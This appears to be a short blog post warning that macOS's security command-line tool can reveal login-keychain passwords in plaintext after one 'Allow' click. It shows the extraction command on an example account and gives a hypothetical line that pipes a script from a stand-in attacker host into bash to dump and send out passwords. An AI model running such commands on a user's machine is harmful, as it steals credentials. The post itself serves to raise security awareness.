Most people know that you can get the cleartext password stored in the OS X “login” keychain by opening the “Keychain Access” app, navigating to the entry and entering your account’s password:
What I didn’t realize until recently is that this is just an artificial barrier introduced by Apple that doesn’t really have any effect. Let me demonstrate by first creating an example account:
Now we will retrieve the password in plaintext without entering the account’s password with the help of
/usr/bin/security, which should come with every recent OS X:
$ /usr/bin/security \ find-internet-password -g \ -a timcook \ -s security.apple.com
The only thing that stands between whoever has access to your terminal and the plaintext password is a single click on “Allow”:
keychain: "/Users/lucas/Library/Keychains/login.keychain" class: "inet" attributes: [...] "acct"
="timcook" [...] "srvr" ="security.apple.com" password: " "
Bottom line is that, if you leave your Mac unlocked and unattended for even a few minutes, you can basically consider all your passwords compromised. For example, somebody could fire up a terminal and run
$ curl http://badperson.com/get-passwords.sh | bash
which could dump all your keychain’s passwords and post them back to the attackers server. This would take between 10 and 30 seconds depending on their typing speed.
Note: I don’t really feel qualified to discuss if there is a better way to handle this. Because you know, having to enter your password all the time sucks too I just wanted to point out that whoever has access to your terminal can be considered to have access to all your passwords.
Let me know what you think!